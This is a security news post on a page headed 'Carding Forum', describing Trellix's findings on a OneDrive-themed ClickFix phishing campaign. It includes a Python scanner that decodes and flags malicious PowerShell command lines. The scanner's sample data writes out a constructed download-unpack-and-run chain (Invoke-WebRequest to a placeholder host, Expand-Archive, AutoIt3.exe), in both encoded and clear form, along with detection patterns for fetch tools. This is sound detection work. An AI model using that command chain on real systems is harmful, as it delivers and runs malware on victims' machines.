Carding Forum
Trellix specialists reveal the mechanisms of a new phishing campaign.
Cybersecurity researchers from the company Trellix warn about a new phishing campaign aimed at Microsoft OneDrive users. The attackers' goal is to get the victim to execute a malicious PowerShell script.
Raphael Pena, a security researcher at Trellix, said that the campaign relies heavily on social engineering to trick users into running a PowerShell script themselves, which leads to the compromise of their systems.
Trellix tracks this phishing campaign under the name OneDrive Pastejacking. The attack begins with an email containing an HTML file that, when opened, displays an image mimicking the OneDrive page, with the error message: "Failed to connect to the OneDrive cloud service. To fix the error, you must manually update the DNS cache."
The message offers two options: "How to fix it" and "Details". Clicking the "Details" button takes the user to the legitimate Microsoft Learn DNS troubleshooting page. Clicking "How to Fix", however, walks the user through a series of steps, including opening a PowerShell terminal and pasting in a Base64-encoded command, ostensibly to fix the error.
The decoded command runs "ipconfig /flushdns", creates a folder called "downloads" on the C drive, downloads an archive file into it, unpacks the archive's contents, and executes the script using "AutoIt3.exe".
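The chain described above (DNS flush, a new C:\downloads folder, an archive download, unpacking, and an AutoIt3.exe launch) is distinctive enough to hunt for in process-creation telemetry. The following is an added example written for this post, not code from the article or from Trellix: a small Python scanner that pulls the Base64 blob out of a PowerShell `-EncodedCommand` argument, decodes it (PowerShell expects UTF-16LE), and scores both the visible and the decoded command against the indicators the article lists. It also catches the same chain when it is pasted in clear text rather than encoded. The log lines, host names and the `https://example.invalid/...` URL are constructed for the example.

```python
"""Detect ClickFix / pastejacking-style PowerShell command lines in process-creation logs.

Added example, not from the article or from Trellix. The sample log lines below are
constructed; the indicators mirror the steps the article describes (flush DNS cache,
create C:\\downloads, fetch and unpack an archive, run AutoIt3.exe).
"""
import base64
import re
from typing import Dict, List, Optional

# Any prefix of -EncodedCommand that PowerShell accepts (-e, -ec, -enc, ...) followed by
# a base64 blob. Lookbehind keeps us from matching inside a longer token.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")

# One regex per link in the chain the article describes (all case-insensitive).
INDICATORS = {
    "flushdns": re.compile(r"(?i)ipconfig\s+/flushdns"),
    "downloads_dir": re.compile(r"(?i)c:\\downloads\b"),
    "fetch": re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
                        r"start-bitstransfer|\bcurl\b|\bwget\b"),
    "unpack": re.compile(r"(?i)expand-archive|\btar\s+-x"),
    "autoit": re.compile(r"(?i)autoit3\.exe|\.a3x\b"),
}

# Constructed log format for the example: "<timestamp> host=<name> cmdline=<command line>".
LOG_FIELD = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+cmdline=(?P<cmd>.*)$")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(cmdline: str) -> Dict[str, object]:
    """Score one command line; both the visible text and the decoded payload are inspected."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline}\n{decoded}"
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Two links of the chain, or any AutoIt execution at all, is enough to raise an alert.
    alert = len(hits) >= 2 or "autoit" in hits
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": hits, "alert": alert}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run assess() over every parsable log line and return the ones that alert."""
    alerts = []
    for line in lines:
        m = LOG_FIELD.match(line)
        if not m:
            continue
        result = assess(m.group("cmd"))
        if result["alert"]:
            alerts.append({"ts": m.group("ts"), "host": m.group("host"), **result})
    return alerts


def _encode(ps: str) -> str:
    """Produce the base64 form PowerShell expects for -EncodedCommand (UTF-16LE input)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed payload text that follows the article's description; placeholder URL, not a real one.
CLICKFIX_PAYLOAD = (
    r"ipconfig /flushdns; New-Item -ItemType Directory -Force C:\downloads | Out-Null; "
    r"Invoke-WebRequest 'https://example.invalid/pkg.zip' -OutFile C:\downloads\pkg.zip; "
    r"Expand-Archive C:\downloads\pkg.zip C:\downloads; "
    r"Start-Process C:\downloads\AutoIt3.exe C:\downloads\script.a3x"
)

# Constructed sample telemetry: two benign lines, one encoded ClickFix line, one clear-text one.
SAMPLE_LOG = [
    '2024-07-31T10:00:01Z host=WS01 cmdline=powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    "2024-07-31T10:00:02Z host=WS01 cmdline=powershell.exe -enc " + _encode("Get-Date"),
    "2024-07-31T10:05:17Z host=WS02 cmdline=powershell.exe -w hidden -enc " + _encode(CLICKFIX_PAYLOAD),
    '2024-07-31T10:06:40Z host=WS03 cmdline=powershell.exe -c "ipconfig /flushdns; '
    'iwr https://example.invalid/x.zip -OutFile C:\\downloads\\x.zip"',
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["ts"], a["host"], "encoded" if a["encoded"] else "clear", a["indicators"])
```

In a real deployment the parsing in `scan_log` would be replaced by whatever produces your process-creation events (Sysmon event 1, Windows 4688 with command-line auditing enabled, or an EDR feed); the decode-then-score logic is the part worth keeping, since the encoded form hides every indicator from a plain string match.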
This campaign targets users in the United States, South Korea, Germany, India, Ireland, Italy, Norway, and the United Kingdom. Similar attacks are also being tracked by ReliaQuest, Proofpoint, and McAfee Labs, indicating the growing popularity of this phishing technique, known as ClickFix.
This case highlights the importance of critical thinking, because cybercriminals are constantly refining their methods, exploiting people's trust in well-known brands and their desire to quickly solve a technical problem.
The key to security is not only the use of antivirus programs, but also the skill of recognizing suspicious requests, especially when they involve executing unknown commands on your device. Running complex technical commands without a clear reason in most cases ends with a malware infection on your computer.
Source